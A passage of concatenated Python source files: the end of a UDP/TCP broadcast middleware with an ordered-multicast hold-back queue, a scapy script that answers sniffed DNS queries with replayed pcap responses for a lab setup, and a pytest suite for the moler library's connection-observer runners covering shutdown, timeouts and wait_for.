data=data.split('_')
messengerUUID = data[0]
messengerIP = data[1]
messengerPort = int(data[2]) # this should be the port where the unicast listener socket
#(of the sender of this message) is listening on
#assert address == (messengerIP, messengerPort)
message=data[3]
messageSplit= message.split(':')
assert len(messageSplit) == 2, "There should not be a ':' in the message"
messageCommand = messageSplit[0]
messageData = messageSplit[1]
#print("TCP Message recieved;\n messageCommand \t :",messageCommand, "\n messageData \t :",messageData )
self.incommingUnicastHistory.append((message, address))
for observer_func in self._listenerList:
observer_func(messengerUUID, clientsocket, messageCommand, messageData)
# after the dedicated function has returned (, or no function wanted to deal with this request)
# the socket can be closed
clientsocket.close()
def subscribeTCPUnicastListener(self, observer_func):
self._listenerList.append(observer_func)
def unSubscribeTCPUnicastListener(self, rmFunc):
# remove all occurences of Function
self._listenerList = [x for x in self._listenerList if x != rmFunc]
class BroadcastHandler():
def __init__(self):
#self.incommingBroadcastQ = Q ()
self.incommingBroadcastHistory = []
self._listenerList = []
self._broadcast_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Create a UDP socket for Listening
self._listen_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Set the socket to broadcast and enable reusing addresses
self._listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self._listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind socket to address and port
self._listen_socket.bind((IP_ADRESS_OF_THIS_PC, BROADCAST_PORT))
# Create Thread to listen to UDP Broadcast
self._listen_UDP_Broadcast_Thread = threading.Thread(target=self._listenUdpBroadcast)
self._listen_UDP_Broadcast_Thread.start()
def broadcast(self, broadcast_message:str):
"""Send message to the broadcast Port defined at lauch of the Programm
Args:
broadcast_message (str): needs to have the format "command:data" (the data could be csv encode with , and #)
"""
# Send message on broadcast address
self._broadcast_socket.sendto(str.encode(Middleware.MY_UUID + '_'+IP_ADRESS_OF_THIS_PC + '_'+str(UDPUnicastHandler._serverPort)+'_'+broadcast_message, encoding='utf-8'), (BROADCAST_IP, BROADCAST_PORT))
# ^this is the port where the _listen_UDP_Unicast_Thread ist listening on
#self.broadcast_socket.close()
def subscribeBroadcastListener(self, observer_func):
self._listenerList.append(observer_func)
def _listenUdpBroadcast(self):
#print("listenUDP Broadcast Thread has started and not blocked Progress (by running in the background)")
while True:
# Code waits here until it recieves a unicast to its port
# thats why this code needs to run in a different thread
data, addr = self._listen_socket.recvfrom(BUFFER_SIZE)
data = data.decode('utf-8')
if data:
data=data.split('_')
messengerUUID = data[0]
messengerIP = data[1]
messengerPort = int(data[2]) # this should be the port where the unicast listener socket
#(of the sender of this message) is listening on
message=data[3]
Middleware.addIpAdress(messengerUUID,(messengerIP, messengerPort)) # add this to list override if already present
if messengerUUID != Middleware.MY_UUID:
#print("Received broadcast message form",addr, ": ", message)
message=data[3]
messageSplit= message.split(':')
assert len(messageSplit) == 2, "There should not be a ':' in the message"
messageCommand = messageSplit[0]
messageData = messageSplit[1]
self.incommingBroadcastHistory.append((messengerUUID, message))
for observer_func in self._listenerList:
observer_func(messengerUUID, messageCommand, messageData)
data = None
@dataclass(order=True)
class OrderedMessage:
messageSeqNum: int
messageCommand: str
messageData: str
messageID:str
messengerUUID:str
deliverable:bool
class HoldBackQ():
def __init__(self):
self._queue = list()
def append(self,x:OrderedMessage):
self._queue.append(x)
#print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! NICE")
#print('new message in HoldBackQ: \t', x)
# Upon receiving agreed (final) priority
# – Mark message as deliverable
# – Reorder the delivery queue based on the priorities
# – Deliver any deliverable messages at the front of priority queue
#
self.checkForDeliverables()
def updateData(self, messageID:str, messageSeqNum:int, messageCommand:str, messageData:str):
#find Messagewith message ID
# set messageSeqNum
# set messageCommand
# set messageData
# setDeliverableTrue
#print('HolbackQ updateData()')
for m in self._queue:
if m.messageID == messageID:
m.messageSeqNum = messageSeqNum
m.messageCommand = messageCommand
m.messageData = messageData
m.deliverable = True
break
self.checkForDeliverables()
def checkForDeliverables(self):
# sort Q
# check if message with lowest ID is deliverable
# deliver this message
sortedQ = sorted(self._queue)
for m in sortedQ:
if m.deliverable:
for observer_func in Middleware.orderedReliableMulticast_ListenerList:
observer_func(m.messengerUUID, m.messageCommand, m.messageData)
self._queue.remove(m)
else:
break
|
dns_server.py | #!/usr/bin/env python
import sys
import struct
import os
import threading
from scapy.all import *
from scapy.layers.inet import _IPOption_HDR
def get_if():
ifs=get_if_list()
iface=None
for i in get_if_list():
if "eth0" in i:
iface=i
break;
if not iface:
print "Cannot find eth0 interface"
exit(1)
return iface
def handle_pkt(pkt, socket, r_pkt):
if UDP in pkt and pkt[UDP].dport == 53:
global r_num
if r_num%10 == 1:
print "Get %4dst packet, id: %5d"%(r_num,pkt.getlayer(DNS).id)
elif r_num%10 == 2:
print "Get %4dst packet, id: %5d"%(r_num,pkt.getlayer(DNS).id)
elif r_num%10 == 3:
print "Get %4dst packet, id: %5d"%(r_num,pkt.getlayer(DNS).id)
else:
print "Get %4dst packet, id: %5d"%(r_num,pkt.getlayer(DNS).id)
r_num += 1
sys.stdout.flush()
pass_pkt(pkt, r_pkt[str(pkt[DNS].id)+str(pkt.qd)], socket)
def pass_pkt(q,r, socket):
p = Ether(src = get_if_hwaddr(iface), dst="FF:FF:FF:FF:FF:FF")
p = p / IP(dst=q[IP].src) / UDP(dport=q[UDP].sport, sport=53) / r.getlayer(DNS)
global s_num
if s_num%10 == 1:
print "Send %4dst packet, id: %5d"%(s_num,p.getlayer(DNS).id)
elif s_num%10 == 2:
print "Send %4dnd packet, id: %5d"%(s_num,p.getlayer(DNS).id)
elif s_num%10 == 3:
print "Send %4drd packet, id: %5d"%(s_num,p.getlayer(DNS).id)
else:
print "Send %4dth packet, id: %5d"%(s_num,p.getlayer(DNS).id)
s_num += 1
sendp(p, iface = iface, verbose=False, socket=socket)
def distribute_thread(pkt, socket, r_pkt):
tmp_pkt = dict(r_pkt)
t = threading.Thread(target=handle_pkt, args=(pkt,socket,tmp_pkt,))
t.setDaemon(True)
t.start()
def main():
ifaces = filter(lambda i: 'eth' in i, os.listdir('/sys/class/net/'))
global iface
iface = ifaces[0]
print("iface: ", iface)
socket = conf.L2socket(iface=iface)
pcaps = rdpcap("dns0313_2_onlyDNS.pcapng")
r_pkt = {}
for pkt in pcaps:
if pkt.qr == 1: # the packet is response
r_pkt[str(pkt[DNS].id)+str(pkt.qd)] = pkt
print "sniffing on %s" % iface
sys.stdout.flush()
sniff(iface = iface,
prn = lambda x: distribute_thread(x, socket, r_pkt))
if __name__ == '__main__':
s_num = 0
r_num = 0
main()
|
py3test_runners.py | # -*- coding: utf-8 -*-
"""
Testing connection observer runner API that should be fullfilled by any runner
- submit
- wait_for
This integration tests check cooperation of the 3 players:
connection_observer - runner - connection
Main focus is on runner and it's correctness.
"""
__author__ = 'Grzegorz Latuszek'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = 'grzegorz.latuszek@nokia.com'
import re
import threading
import time
import platform
import importlib
import asyncio
import mock
import pytest
import contextlib
from moler.connection_observer import ConnectionObserver
from moler.util.loghelper import disabled_logging
# --------------------------------------------------------------------
# Testing data path from connection to connection observer
# Runner is involved in data path establishing/dropping/securing
# --------------------------------------------------------------------
@pytest.mark.asyncio
async def test_observer_gets_all_data_of_connection_after_it_is_submitted_to_background(observer_runner):
# another words: after returning from runner.submit() no data can be lost, no races
# Raw 'def' usage note:
# This functionality works as well when runner is used inside raw def function
# since it only uses runner.submit() + awaiting time
# another words - runner is running over some time period
# The only difference is that raw def function may use only standalone_runner (which is subset of observer_runner)
# and inside test you exchange 'await asyncio.sleep()' with 'time.sleep()'
from moler.observable_connection import ObservableConnection
with disabled_logging():
durations = []
for n in range(20): # need to test multiple times to ensure there are no thread races
moler_conn = ObservableConnection()
net_down_detector = NetworkDownDetector(connection=moler_conn, runner=observer_runner)
connection = net_down_detector.connection
start_time = net_down_detector.start_time = time.time()
observer_runner.submit(net_down_detector)
durations.append(time.time() - start_time)
connection.data_received("61 bytes")
connection.data_received("62 bytes")
connection.data_received("ping: Network is unreachable")
assert net_down_detector.all_data_received == ["61 bytes", "62 bytes", "ping: Network is unreachable"]
print("\n{}.submit() duration == {}".format(observer_runner.__class__.__name__,
float(sum(durations))/len(durations)))
def test_runner_secures_observer_against_additional_data_after_observer_is_done(observer_runner):
"""Done observer should not get data even before unsubscribe from moler-connection"""
# correctly written observer looks like:
#
# def data_received(self, data):
# if not self.done():
# parse(data)
#
# This test checks if runners secure wrong-written-observers with missing 'if not self.done():'
from moler.observable_connection import ObservableConnection
with disabled_logging():
for n in range(20): # need to test multiple times to ensure there are no thread races
moler_conn = ObservableConnection()
net_down_detector = NetworkDownDetector(connection=moler_conn, runner=observer_runner)
net_down_detector.start_time = time.time() # must start observer lifetime before runner.submit()
connection = net_down_detector.connection
net_down_detector.start_time = time.time()
observer_runner.submit(net_down_detector)
connection.data_received("61 bytes")
connection.data_received("ping: Network is unreachable")
connection.data_received("62 bytes")
assert net_down_detector.all_data_received == ["61 bytes", "ping: Network is unreachable"]
def test_runner_secures_observer_against_additional_data_after_runner_shutdown(observer_runner):
"""In-shutdown runner should not pass data to observer even before unsubscribe from moler-connection"""
# Even without running background feeder
# we can use correctly constructed secure_data_received(data)
# to block passing data from connection to observer while runner is in-shutdown state
from moler.observable_connection import ObservableConnection
moler_conn = ObservableConnection()
# check if shutdown stops all observers running inside given runner
net_down_detector1 = NetworkDownDetector(connection=moler_conn, runner=observer_runner)
net_down_detector2 = NetworkDownDetector(connection=moler_conn, runner=observer_runner)
net_down_detector1.start_time = time.time() # must start observer lifetime before runner.submit()
net_down_detector2.start_time = time.time() # must start observer lifetime before runner.submit()
connection = moler_conn
observer_runner.submit(net_down_detector1)
observer_runner.submit(net_down_detector2)
connection.data_received("61 bytes")
observer_runner.shutdown()
connection.data_received("62 bytes")
assert net_down_detector1.all_data_received == ["61 bytes"]
assert net_down_detector2.all_data_received == ["61 bytes"]
@pytest.mark.asyncio
async def test_runner_unsubscribes_from_connection_after_runner_shutdown(observer_runner):
# see - Raw 'def' usage note
from moler.observable_connection import ObservableConnection
moler_conn = ObservableConnection()
# check if shutdown unsubscribes all observers running inside given runner
net_down_detector1 = NetworkDownDetector(connection=moler_conn, runner=observer_runner)
net_down_detector2 = NetworkDownDetector(connection=moler_conn, runner=observer_runner)
net_down_detector1.start_time = time.time() # must start observer lifetime before runner.submit()
net_down_detector2.start_time = time.time() # must start observer lifetime before runner.submit()
assert len(moler_conn._observers) == 0
observer_runner.submit(net_down_detector1)
observer_runner.submit(net_down_detector2)
assert len(moler_conn._observers) == 2
observer_runner.shutdown()
await asyncio.sleep(0.1)
assert len(moler_conn._observers) == 0
# TODO: test_runner_unsubscribes_from_connection_after_observer_is_done
@pytest.mark.asyncio
async def test_runner_doesnt_break_on_exception_raised_inside_observer(observer_runner):
"""Runner should be secured against 'wrongly written' connection-observer"""
# see - Raw 'def' usage note
with failing_net_down_detector(fail_on_data="zero bytes",
fail_by_raising=Exception("unknown format"),
runner=observer_runner) as conn_observer:
connection = conn_observer.connection
conn_observer.start_time = time.time() # must start observer lifetime before runner.submit()
observer_runner.submit(conn_observer)
connection.data_received("61 bytes")
connection.data_received("zero bytes")
connection.data_received("ping: Network is unreachable")
assert conn_observer.all_data_received == ["61 bytes"]
# --------------------------------------------------------------------
# Testing exceptions handling
# Runner is involved in data path securing
# --------------------------------------------------------------------
# TODO: correct handling/storage of stack-trace of caught exceptions
@pytest.mark.asyncio
async def test_runner_sets_observer_exception_result_for_exception_raised_inside_observer(observer_runner):
"""Runner should correct behaviour of 'wrongly written' connection-observer"""
# Correctly written observer should not allow exceptions escaping from data_received().
# Such exceptions should be caught and stored inside observer via set_exception()
# see - Raw 'def' usage note
unknown_format_exception = Exception("unknown format")
with failing_net_down_detector(fail_on_data="zero bytes",
fail_by_raising=unknown_format_exception,
runner=observer_runner) as conn_observer:
connection = conn_observer.connection
conn_observer.start_time = time.time() # must start observer lifetime before runner.submit()
observer_runner.submit(conn_observer)
connection.data_received("61 bytes")
connection.data_received("zero bytes")
connection.data_received("ping: Network is unreachable")
assert conn_observer._exception is unknown_format_exception
@pytest.mark.asyncio
async def test_future_is_not_exception_broken_when_observer_is_exception_broken(observer_runner):
# Runner created future is involved in data path handling.
# That handling includes catching/storing exceptions. But such exception is exception of connection_observer
# and not future itself - future behaviour is OK when it can correctly handle exception of observer.
# see - Raw 'def' usage note
with failing_net_down_detector(fail_on_data="zero bytes",
fail_by_raising=Exception("unknown format"),
runner=observer_runner) as conn_observer:
connection = conn_observer.connection
conn_observer.start_time = time.time() # must start observer lifetime before runner.submit()
future = observer_runner.submit(conn_observer)
connection.data_received("61 bytes")
connection.data_received("zero bytes")
await asyncio.sleep(0.2)
assert future.exception() is None # assumption here: used future has .exceptions() API
@pytest.mark.asyncio
async def test_future_doesnt_return_result_of_observer(net_down_detector):
"""Future just returns None when it is done"""
# see - Raw 'def' usage note
observer_runner = net_down_detector.runner
connection = net_down_detector.connection
net_down_detector.start_time = time.time() # must start observer lifetime before runner.submit()
future = observer_runner.submit(net_down_detector)
connection.data_received("61 bytes")
connection.data_received("ping: Network is unreachable")
await asyncio.sleep(0.2)
assert future.result() is None
# --------------------------------------------------------------------
# Testing timeouts handling
#
# Part I - future's reaction on timeout
# Future is a result produced by runner.submit(). Future expresses
# "background life" of connection observer. In part I we test
# pure-background-life without impact of wait_for() API - means
# just send it to background and wait till timeout
# --------------------------------------------------------------------
@pytest.mark.asyncio
async def test_future_timeouts_after_timeout_of_observer(connection_observer):
"""Observer has .timeout member"""
# see - Raw 'def' usage note
from moler.exceptions import ResultNotAvailableYet, MolerTimeout
observer_runner = connection_observer.runner
connection_observer.timeout = 0.1
connection_observer.start_time = time.time() # must start observer lifetime before runner.submit()
future = observer_runner.submit(connection_observer)
with pytest.raises(ResultNotAvailableYet):
connection_observer.result()
await asyncio.sleep(0.2)
with pytest.raises(MolerTimeout):
connection_observer.result() # we should have exception in connection_observer
assert future.done()
if not future.cancelled(): # future for timeouted observer should be either cancelled
assert future.exception() is None # or done with no exception inside future itself
@pytest.mark.asyncio
async def test_future_accommodates_to_extending_timeout_of_observer(connection_observer):
# see - Raw 'def' usage note
import logging
from moler.exceptions import ResultNotAvailableYet, MolerTimeout
logger = logging.getLogger('moler.runner')
observer_runner = connection_observer.runner
connection_observer.timeout = 0.2
connection_observer.start_time = time.time() # must start observer lifetime before runner.submit()
observer_runner.submit(connection_observer)
with pytest.raises(ResultNotAvailableYet): # not timed out yet
connection_observer.result()
logger.debug("first await asyncio.sleep(0.1)")
await asyncio.sleep(0.1)
logger.debug("after first await asyncio.sleep(0.1)")
with pytest.raises(ResultNotAvailableYet): # not timed out yet
connection_observer.result()
connection_observer.timeout = 0.5 # EXTEND
logger.debug("second await asyncio.sleep(0.1)")
await asyncio.sleep(0.1)
logger.debug("after second await asyncio.sleep(0.1)")
with pytest.raises(ResultNotAvailableYet): # not timed out yet
connection_observer.result()
logger.debug("final await asyncio.sleep(0.4)")
await asyncio.sleep(0.4)
logger.debug("after final await asyncio.sleep(0.4)")
with pytest.raises(MolerTimeout): # should time out
connection_observer.result()
@pytest.mark.asyncio
async def test_future_accommodates_to_shortening_timeout_of_observer(connection_observer):
# see - Raw 'def' usage note
from moler.exceptions import ResultNotAvailableYet, MolerTimeout
observer_runner = connection_observer.runner
connection_observer.timeout = 0.2
connection_observer.start_time = time.time() # must start observer lifetime before runner.submit()
observer_runner.submit(connection_observer)
with pytest.raises(ResultNotAvailableYet): # not timed out yet
connection_observer.result()
await asyncio.sleep(0.08)
with pytest.raises(ResultNotAvailableYet): # not timed out yet
connection_observer.result()
connection_observer.timeout = 0.1 # SHORTEN
await asyncio.sleep(0.04)
with pytest.raises(MolerTimeout): # should time out
connection_observer.result()
# --------------------------------------------------------------------
# Testing timeouts handling
#
# Part II - timeouts while inside wait_for()
# wait_for() API takes observer from background-life into foreground-life
# testing here:
# being inside blocking wait_for() - escape it on timeout
# --------------------------------------------------------------------
def test_wait_for__times_out_on_constructor_timeout(connection_observer):
from moler.exceptions import MolerTimeout
observer_runner = connection_observer.runner
connection_observer.timeout = 0.2
start_time = connection_observer.start_time = time.time()
future = observer_runner.submit(connection_observer)
with pytest.raises(MolerTimeout):
observer_runner.wait_for(connection_observer, future,
timeout=None) # means: use .timeout of observer
connection_observer.result() # should raise Timeout
duration = time.time() - start_time
assert duration >= 0.2
assert duration < 0.25
time.sleep(0.1) # future may be 'not done yet' (just after timeout) - it should be "in exiting of feed"
assert future.done()
if not future.cancelled(): # future for timeouted observer should be either cancelled
assert future.exception() is None # or done with no exception inside future itself
def test_wait_for__times_out_on_specified_timeout(connection_observer):
from moler.exceptions import MolerTimeout
observer_runner = connection_observer.runner
connection_observer.timeout = 1.5
connection_observer.terminating_timeout = 0.0
start_time = connection_observer.start_time = time.time()
future = observer_runner.submit(connection_observer)
time.sleep(0.1)
with pytest.raises(MolerTimeout):
wait4_start_time = time.time() # wait_for() timeout is counted from wait_for() line in code
observer_runner.wait_for(connection_observer, future,
timeout=0.2) # means: use timeout of wait_for (shorter then initial one)
connection_observer.result() # should raise Timeout
now = time.time()
observer_life_duration = now - start_time
wait4_duration = now - wait4_start_time
assert wait4_duration >= 0.2
assert wait4_duration < 0.3
assert observer_life_duration >= 0.3
assert observer_life_duration < 0.4
def test_wait_for__times_out_on_earlier_timeout(connection_observer):
from moler.exceptions import MolerTimeout
observer_runner = connection_observer.runner
connection_observer.timeout = 0.3
start_time = connection_observer.start_time = time.time()
future = observer_runner.submit(connection_observer)
with pytest.raises(MolerTimeout):
wait4_start_time = time.time() # wait_for() timeout is counted from wait_for() line in code
observer_runner.wait_for(connection_observer, future,
timeout=0.5) # means: timeout of wait_for longer then initial one
connection_observer.result() # should raise Timeout
now = time.time()
observer_life_duration = now - start_time
wait4_duration = now - wait4_start_time
assert observer_life_duration >= 0.3
assert observer_life_duration < 0.35
assert wait4_duration < 0.5
def test_wait_for__tracks_changes_of_observer_timeout__extension(connection_observer):
from moler.exceptions import MolerTimeout
observer_runner = connection_observer.runner
connection_observer.timeout = 0.2
start_time = connection_observer.start_time = time.time()
future = observer_runner.submit(connection_observer)
def modify_observer_timeout():
time.sleep(0.15)
connection_observer.timeout = 0.35 # extend while inside wait_for()
threading.Thread(target=modify_observer_timeout).start()
with pytest.raises(MolerTimeout):
observer_runner.wait_for(connection_observer, future,
timeout=None)
connection_observer.result() # should raise Timeout
duration = time.time() - start_time
assert duration >= 0.35
assert duration < 0.4
def test_wait_for__tracks_changes_of_observer_timeout__shortening(connection_observer):
from moler.exceptions import MolerTimeout
observer_runner = connection_observer.runner
connection_observer.timeout = 0.35
start_time = connection_observer.start_time = time.time()
future = observer_runner.submit(connection_observer)
def modify_observer_timeout():
time.sleep(0.05)
connection_observer.timeout = 0.2 # shorten while inside wait_for()
threading.Thread(target=modify_observer_timeout).start()
with pytest.raises(MolerTimeout):
observer_runner.wait_for(connection_observer, future,
timeout=None)
connection_observer.result() # should raise Timeout
duration = time.time() - start_time
assert duration >= 0.2
assert duration < 0.25
def test_wait_for__direct_timeout_takes_precedence_over_extended_observer_timeout(connection_observer):
# this is another variant of test_wait_for__times_out_on_earlier_timeout
from moler.exceptions import MolerTimeout
observer_runner = connection_observer.runner
connection_observer.timeout = 0.2
connection_observer.terminating_timeout = 0.0
start_time = connection_observer.start_time = time.time()
future = observer_runner.submit(connection_observer)
def modify_observer_timeout():
time.sleep(0.15)
connection_observer.timeout = 0.4 # extend while inside wait_for()
threading.Thread(target=modify_observer_timeout).start()
with pytest.raises(MolerTimeout):
wait4_start_time = time.time() # wait_for() timeout is counted from wait_for() line in code
observer_runner.wait_for(connection_observer, future,
timeout=0.25) # should take precedence, means: 0.25 sec from now
connection_observer.result() # should raise Timeout
now = time.time()
observer_life_duration = now - start_time
wait4_duration = now - wait4_start_time
assert wait4_duration >= 0.25
assert wait4_duration < 0.35
assert observer_life_duration > 0.2
assert observer_life_duration < 0.4
# --------------------------------------------------------------------
# Testing timeouts handling
#
# Part III - on_timeout() callback
# --------------------------------------------------------------------
def test_observer__on_timeout__is_called_once_at_timeout(connection_observer):
from moler.exceptions import MolerTimeout
observer_runner = connection_observer.runner
connection_observer.timeout = 0.33
connection_observer.start_time = time.time() # must start observer lifetime before runner.submit()
future = observer_runner.submit(connection_observer)
with mock.patch.object(connection_observer, "on_timeout") as timeout_callback:
with pytest.raises(MolerTimeout):
observer_runner.wait_for(connection_observer, future,
timeout=0.33)
connection_observer.result() # should raise Timeout
timeout_callback.assert_called_once()
def test_runner_shutdown_cancels_remaining_active_feeders_inside_main_thread(async_runner):
from moler.observable_connection import ObservableConnection
connection_observer = NetworkDownDetector(connection=ObservableConnection(), runner=async_runner)
connection_observer.start_time = time.time() # must start observer lifetime before runner.submit()
future = async_runner.submit(connection_observer)
future._loop.run_until_complete(asyncio.sleep(1.0)) # feeder will start processing inside loop
# time.sleep(0.5)
async_runner.shutdown()
assert connection_observer.cancelled()
def test_runner_shutdown_cancels_remaining_inactive_feeders_inside_main_thread(observer_runner):
from moler.observable_connection import ObservableConnection
connection_observer = NetworkDownDetector(connection=ObservableConnection(), runner=observer_runner)
connection_observer.start_time = time.time() # must start observer lifetime before runner.submit()
future = observer_runner.submit(connection_observer)
time.sleep(0.2) # won't enter event loop of future - feeder won't start processing
observer_runner.shutdown()
assert connection_observer.cancelled()
def test_runner_shutdown_cancels_remaining_feeders_inside_threads(observer_runner):
from moler.observable_connection import ObservableConnection
observers_pool = []
for idx in range(3):
connection_observer = NetworkDownDetector(connection=ObservableConnection(), runner=observer_runner)
observers_pool.append(connection_observer)
def submit_feeder(connection_observer):
connection_observer.start_time = time.time() # must start observer lifetime before runner.submit()
future = observer_runner.submit(connection_observer)
while not future.done():
time.sleep(0.1)
th_pool = [threading.Thread(target=submit_feeder, args=(connection_observer,)) for connection_observer in observers_pool]
for th in th_pool:
th.start()
# loop.run_until_complete(remaining_tasks) # let it enter feeder
time.sleep(0.5)
observer_runner.shutdown()
for th in th_pool:
th.join()
assert observers_pool[0].cancelled()
assert observers_pool[1].cancelled()
assert observers_pool[2].cancelled()
# def test_observer__on_timeout__is_called_once_at_timeout_threads_races(observer_runner):
# from moler.exceptions import MolerTimeout
# from moler.observable_connection import ObservableConnection
#
# with disabled_logging():
# observers_pool = []
# for idx in range(200):
# connection_observer = NetworkDownDetector(connection=ObservableConnection(), runner=observer_runner)
# connection_observer.timeout = 0.33
# connection_observer.on_timeout = mock.MagicMock()
# observers_pool.append(connection_observer)
#
# def await_on_timeout(connection_observer):
# connection_observer.start_time = time.time() # must start observer lifetime before runner.submit()
# future = observer_runner.submit(connection_observer)
# with pytest.raises(MolerTimeout):
# observer_runner.wait_for(connection_observer, future, timeout=0.33)
# connection_observer.result() # should raise Timeout
#
# th_pool = [threading.Thread(target=await_on_timeout, args=(connection_observer,)) for connection_observer in observers_pool]
# for th in th_pool:
# th.start()
# for th in th_pool:
# th.join()
#
# for connection_observer in observers_pool:
# timeout_callback = connection_observer.on_timeout
# timeout_callback.assert_called_once()
# --------------------------------------------------------------------
# Testing wait_for() API
#
# (timeouts inside wait_for are covered above)
# Should exit from blocking call when expected data comes.
# Future should be done as well.
# --------------------------------------------------------------------
def test_can_await_connection_observer_to_complete(observer_and_awaited_data):
connection_observer, awaited_data = observer_and_awaited_data
observer_runner = connection_observer.runner
connection_observer.start_time = time.time() # must start observer lifetime before runner.submit()
future = observer_runner.submit(connection_observer)
def inject_data():
time.sleep(0.1)
moler_conn = connection_observer.connection
moler_conn.data_received(awaited_data)
ext_io = threading.Thread(target=inject_data)
ext_io.start()
observer_runner.wait_for(connection_observer, future,
timeout=0.3)
assert connection_observer.done() # done but success or failure?
assert connection_observer.result() is not None # it should be success
assert future.done()
assert future.result() is None
# --------------------------------------------------------------------
# Testing wait_for_iterator() API
#
# Should exit from blocking call when expected data comes.
# Future should be done as well.
# --------------------------------------------------------------------
@pytest.mark.asyncio
async def test_can_async_await_connection_observer_to_complete(observer_and_awaited_data):
connection_observer, awaited_data = observer_and_awaited_data
observer_runner = connection_observer.runner
connection_observer.start_time = time.time() # must start observer lifetime before runner.submit()
future = observer_runner.submit(connection_observer)
connection_observer.timeout = 0.3
def inject_data():
time.sleep(0.1)
moler_conn = connection_observer.connection
moler_conn.data_received(awaited_data)
ext_io = threading.Thread(target=inject_data)
ext_io.start()
connection_observer._future = future
connection_observer.runner = observer_runner
# connection_observer.__await__ calls connection_observer.runner.wait_for_iterator(connection_observer,
# connection_observer._future)
await connection_observer
assert connection_observer.done() # done but success or failure?
assert connection_observer.result() is not None # it should be success
assert future.done()
assert future.result() is None
# --------------------------------------------------------------------
# Testing correct usage
#
# We want to be helpful for users. Even if some usage is 'user fault'
# (like calling long lasting functions inside async code) we want
# to inform about such cases as much as we can. Not always it is possible.
# --------------------------------------------------------------------
@pytest.mark.asyncio
async def test_wait_for__is_prohibited_inside_async_def(async_runner):
# can't raise in generic runner since why non-async-runner should bother about being used inside 'async def'
# using them in such case is end-user error the same way as using time.sleep(2.41) inside 'async def'
from moler.exceptions import WrongUsage
from moler.observable_connection import ObservableConnection
# TODO: can we confidently check "called from async def"
# https://stackoverflow.com/questions/30155138/how-can-i-write-asyncio-coroutines-that-optionally-act-as-regular-functions
# "magically_determine_if_being_yielded_from() is actually event_loop.is_running()"
# but that works for asyncio and not for curio/trio
#
# Any way to treat wait_for() as awaitable?
#
connection_observer = NetworkDownDetector(connection=ObservableConnection(), runner=async_runner)
connection_observer.start_time = time.time() # must start observer lifetime before runner.submit()
future = async_runner.submit(connection_observer)
with pytest.raises(WrongUsage) as err:
async_runner.wait_for(connection_observer, future)
connection_observer.result() # should raise WrongUsage
assert "Can't call wait_for() from 'async def' - it is blocking call" in str(err.value)
# check "fix-hint" inside exception
assert re.findall(r'consider using:\s+await observer\s+instead of:\s+observer.await_done()', str(err.value))
@pytest.mark.asyncio
async def test_wait_for__prohibited_inside_async_def_speaks_in_observer_API(async_runner):
from moler.exceptions import WrongUsage
from moler.observable_connection import ObservableConnection
connection_observer = NetworkDownDetector(connection=ObservableConnection(), runner=async_runner)
connection_observer.start() # internally calls async_runner.submit()
future = async_runner.submit(connection_observer)
with pytest.raises(WrongUsage) as err:
connection_observer.await_done() # internally calls async_runner.wait_for() + connection_observer.result()
assert "Can't call await_done() from 'async def' - it is blocking call" in str(err.value)
# check "fix-hint" inside exception
assert re.findall(r'consider using:\s+await observer\s+instead of:\s+observer.await_done()', str(err.value))
# TODO: test usage of iterable/awaitable
# TODO: handling not awaited futures (infinite background observer, timeouting observer but "failing path stopped"
# --------------------------- resources ---------------------------
def is_python36_or_above():
(ver_major, ver_minor, _) = platform.python_version().split('.')
return (ver_major == '3') and (int(ver_minor) >= 6)
# bg_runners may be called from both 'async def' and raw 'def' functions
available_bg_runners = [] # 'runner.ThreadPoolExecutorRunner']
available_bg_runners = ['runner.ThreadPoolExecutorRunner']
# standalone_runners may run without giving up control to some event loop (since they create own thread(s))
available_standalone_runners = ['runner.ThreadPoolExecutorRunner']
# async_runners may be called only from 'async def' functions and require already running events-loop
available_async_runners = []
if is_python36_or_above():
available_bg_runners.append('asyncio_runner.AsyncioRunner')
available_async_runners.append('asyncio_runner.AsyncioRunner')
# available_bg_runners.append('asyncio_runner.AsyncioInThreadRunner')
# available_async_runners.append('asyncio_runner.AsyncioInThreadRunner')
# available_standalone_runners.append('asyncio_runner.AsyncioInThreadRunner')
pass
@pytest.yield_fixture(params=available_bg_runners)
def observer_runner(request):
module_name, class_name = request.param.rsplit('.', 1)
module = importlib.import_module('moler.{}'.format(module_name))
runner_class = getattr(module, class_name)
runner = runner_class()
# NOTE: AsyncioRunner given here will start without running event loop
yield runner
# remove exceptions collected inside ConnectionObserver
ConnectionObserver.get_unraised_exceptions(remove=True)
runner.shutdown()
@pytest.yield_fixture(params=available_standalone_runners)
def standalone_runner(request):
module_name, class_name = request.param.rsplit('.', 1)
module = importlib.import_module('moler.{}'.format(module_name))
runner_class = getattr(module, class_name)
runner = runner_class()
yield runner
# remove exceptions collected inside ConnectionObserver
ConnectionObserver.get_unraised_exceptions(remove=True)
runner.shutdown()
@pytest.yield_fixture(params=available_async_runners)
def async_runner(request):
module_name, class_name = request.param.rsplit('.', 1)
module = importlib.import_module('moler.{}'.format(module_name))
runner_class = getattr(module, class_name)
runner = runner_class()
yield runner
# remove exceptions collected inside ConnectionObserver
ConnectionObserver.get_unraised_exceptions(remove=True)
runner.shutdown()
class NetworkDownDetector(ConnectionObserver):
def __init__(self, connection=None, runner=None):
super(NetworkDownDetector, self).__init__(connection=connection, runner=runner)
self.all_data_received = []
def data_received(self, data):
"""
Awaiting change like:
64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms
ping: sendmsg: Network is unreachable
"""
self.all_data_received.append(data)
if not self.done():
if "Network is unreachable" in data:
when_detected = time.time()
self.set_result(result=when_detected)
@pytest.yield_fixture()
def connection_observer(observer_runner):
from moler.observable_connection import ObservableConnection
moler_conn = ObservableConnection()
observer = NetworkDownDetector(connection=moler_conn, runner=observer_runner)
yield observer
# remove exceptions collected inside ConnectionObserver
ConnectionObserver.get_unraised_exceptions(remove=True)
@pytest.fixture()
def net_down_detector(connection_observer): # let name say what type of observer it is
return connection_observer
@contextlib.contextmanager
def failing_net_down_detector(fail_on_data, fail_by_raising, runner):
from moler.observable_connection import ObservableConnection
class FailingNetworkDownDetector(NetworkDownDetector):
def data_received(self, data):
if data == fail_on_data:
raise fail_by_raising
return super(FailingNetworkDownDetector, self).data_received(data)
moler_conn = ObservableConnection()
